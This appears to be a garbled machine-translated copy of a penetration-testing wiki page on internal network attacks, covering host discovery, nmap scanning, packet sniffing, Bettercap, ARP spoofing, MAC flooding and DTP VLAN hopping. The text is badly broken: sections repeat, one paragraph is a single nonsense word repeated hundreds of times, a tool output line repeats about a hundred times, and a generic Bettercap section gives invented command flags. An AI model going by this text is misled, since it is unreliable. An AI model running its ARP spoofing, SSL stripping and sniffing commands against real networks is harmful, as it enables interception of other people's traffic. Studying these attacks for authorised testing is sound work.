{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known Wifi attacks at the time of the writing:

{% content-ref url="../pentesting-wifi/" %} pentesting-wifi {% endcontent-ref %}

Discovering hosts from the inside

If you are inside the network one of the first things you will want to do is to discover other hosts. Depending on how much noise you can/want to do, different actions could be performed:

Passive

You can use these tools to passively discover hosts inside a connected network:

Klingon Translation:

Pentesting Wifi

Here you can find a nice guide of all the well known

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

QaD

QaD. QaD (QaD/ghItlh/UDP/SCTP Port Discovery) techniques can be vItlhutlh here.
'ach, vaj vItlhutlh network vItlhutlh, vItlhutlh things vItlhutlh:

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Active ICMP

Note that the techniques commented in Discovering hosts from the outside (ICMP) can be also applied here.
But, as you are in the same network as the other hosts, you can do more things:

• If you ping a subnet broadcast address the ping should be arrive to each host and they could respond to you: ping -b 10.10.5.255
• Pinging the network broadcast address you could even find hosts inside other subnets: ping -b 255.255.255.255
• Use the -PE, -PP, -PM flags of nmapto perform host discovery sending respectively ICMPv4 echo, timestamp, and subnet mask requests: nmap -PE -PM -PP -sn -vvv -n 10.12.5.0/24

Wake On Lan

Wake On Lan is used to turn on computers through a network message. The magic packet used to turn on the computer is only a packet where a MAC Dst is provided and then it is repeated 16 times inside the same paket.
Then this kind of packets are usually sent in an ethernet 0x0842 or in a UDP packet to port 9.
If no [MAC] is provided, the packet is sent to broadcast ethernet (and the broadcast MAC will be the one being repeated).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Scanning Hosts

QaStaHvIS (tInDu'pu') (tInDu'pu' 'ej tInDu'pu' qutlh) vItlhutlhlaHbe'chugh, vaj vItlhutlhlaHbe'chugh.

TCP

• Open port: SYN --> SYN/ACK --> RST
• Closed port: SYN --> RST/ACK
• Filtered port: SYN --> [NO RESPONSE]
• Filtered port: SYN --> ICMP message

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP>
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP>
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

UDP

UDP port scan vItlhutlh:

• UDP packet yIlo' je 'ej ICMP unreachable response check (port closed case 'ach ICMP filter vaj open port information 'oH).
• Formatted datagrams yIlo' je service response elicit (e.g., DNS, DHCP, TFTP, 'ej others, nmap-payloads list). Response jImej, 'ej, port open.

Nmap "-sV" both options mix (UDP scans slow), 'ach UDP scans TCP scans slower 'oH:

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP>
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP>
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

SCTP Scan

SCTP (Stream Control Transmission Protocol) jatlhbe'chugh TCP (Transmission Control Protocol) je UDP (User Datagram Protocol). SCTP jatlhbe'chugh telephony data IP networks, Signaling System 7 (SS7) vItlhutlhvam vItlhutlhvam jatlhbe'chugh. SCTP jatlhbe'chugh SIGTRAN protocol family, SS7 signals IP networks vItlhutlhvam jatlhbe'chugh.

SCTP vItlhutlhvam IBM AIX, Oracle Solaris, HP-UX, Linux, Cisco IOS, je VxWorks jatlhbe'chugh, telecommunication je networking vItlhutlhvam je.

nmap vItlhutlhvam SCTP scans: -sY je -sZ

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

IDS and IPS evasion

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

More nmap options

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

Revealing Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using nonpublic source addresses. tcpdump can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the eth2 interface, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out.

QIbDaq IDS je IPS

{% content-ref url="ids-evasion.md" %} ids-evasion.md {% endcontent-ref %}

nmap qagh

{% content-ref url="nmap-summary-esp.md" %} nmap-summary-esp.md {% endcontent-ref %}

QaD Internal IP Addresses

Misconfigured routers, firewalls, and network devices sometimes respond to network probes using nonpublic source addresses. tcpdump can be utilized to identify packets received from private addresses during testing. Specifically, on Kali Linux, packets can be captured on the eth2 interface, which is accessible from the public Internet. It's important to note that if your setup is behind a NAT or a Firewall, such packets are likely to be filtered out.

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

qIj

qIj vItlhutlh IP ranges, subnet sizes, MAC addresses, je hostnames vItlhutlh reviewing captured frames je packets. vaj network misconfigured qoj switching fabric under stress, attackers vItlhutlh capture sensitive material via passive network qIj.

vaj switched Ethernet network configured properly, Hoch broadcast frames je material destined for your MAC address vItlhutlh.

TCPDump

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

Translation:

Qapla'! Hoch, 'ej, Wireshark jatlhlaHbe' 'ej realtime GUI 'e' remote machine packets capture.

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

Bettercap

Bettercap is a powerful, modular, and portable tool used for network attacks and monitoring. It provides a wide range of features and capabilities that can be used during penetration testing and network security assessments.

Installation

To install Bettercap, follow these steps:

1. Step 1: Open a terminal window.

2. Step 2: Run the following command to update the package lists:

   sudo apt update
   

3. Step 3: Run the following command to install Bettercap:

   sudo apt install bettercap
   

Usage

Once Bettercap is installed, you can use it to perform various network attacks and monitoring tasks. Here are some common usage examples:

• ARP Spoofing: Use Bettercap to perform ARP spoofing attacks, which allow you to intercept and manipulate network traffic.

  sudo bettercap -iface eth0 --proxy
  

• DNS Spoofing: Use Bettercap to perform DNS spoofing attacks, which allow you to redirect DNS queries and manipulate DNS responses.

  sudo bettercap -iface eth0 --dns
  

• SSL/TLS Stripping: Use Bettercap to perform SSL/TLS stripping attacks, which allow you to downgrade HTTPS connections to HTTP and intercept sensitive information.

  sudo bettercap -iface eth0 --proxy-module sslstrip
  

• Packet Sniffing: Use Bettercap to capture and analyze network packets.

  sudo bettercap -iface eth0 --sniffer
  

Conclusion

Bettercap is a versatile tool that can be used for various network attacks and monitoring tasks. It provides a wide range of features and capabilities that can be leveraged during penetration testing and network security assessments.

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

Wireshark

Qapla'.

Capturing credentials

https://github.com/lgandx/PCredz vItlhutlh credentials jatlh pcap pagh live interface.

LAN attacks

ARP spoofing

ARP Spoofing consist on sending gratuitous ARPResponses to indicate that the IP of a machine has the MAC of our device. Then, the victim will change the ARP table and will contact our machine every time it wants to contact the IP spoofed.

Bettercap

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

Arpspoof

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

MAC Flooding - CAM overflow

tlhIngan Hol translation:

MAC Flooding - CAM overflow

Switch vItlhutlhlaH CAM table vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH vItlhutlhlaH v

macof -i <interface>

802.1Q VLAN / DTP Attacks

Dynamic Trunking

Dynamic Trunking Protocol (DTP) jatlh link layer protocol jatlh, jatlhbe'chugh automatic system jatlhbe'chugh, switches jatlhbe'chugh automatic mode jatlhbe'chugh (Trunk) jatlhbe'chugh non-trunk mode jatlhbe'chugh. DTP deployment network design suboptimal, trunks manually configure jatlhbe'chugh, documentation proper ensuring jatlhbe'chugh importance underscore.

Switch ports default Dynamic Auto mode jatlhbe'chugh, meaning neighboring switch prompted jatlhbe'chugh trunking initiate ready jatlhbe'chugh. Pentester attacker switch connect jatlhbe'chugh DTP Desirable frame jatlhbe'chugh, port trunk mode jatlhbe'chugh compel. Attacker VLANs enumerate jatlhbe'chugh STP frame analysis jatlhbe'chugh VLAN segmentation circumvent jatlhbe'chugh virtual interfaces setup.

DTP presence switches many default, adversaries exploit jatlhbe'chugh switch behavior mimic jatlhbe'chugh, traffic access gain jatlhbe'chugh VLANs. Script dtpscan.sh utilized interface monitor jatlhbe'chugh, switch Default, Trunk, Dynamic, Auto, Access mode assess VLAN hopping attacks immune configuration latter. Tool vulnerability switch assess.

Network vulnerability identified, Yersinia tool employed DTP protocol "enable trunking" jatlhbe'chugh, packets observation VLANs all jatlhbe'chugh.

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

VLANmey jatlhlaHbe'chugh DTPHijacking.py script-Daq DTP Desirable frame generate qaStaHvIS. Qapbe'ghach DTP Desirable qaStaHvIS. SwitchDaq 'ejvatlh DTP qaStaHvIS cha'logh vItlhutlh. cha'logh vItlhutlh, cha'logh qaStaHvIS cha'logh.

sudo python3 DTPHijacking.py --interface eth0

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

Access/Desirable (0x03) DTP 802.1Q/802.1Q (0xa5)

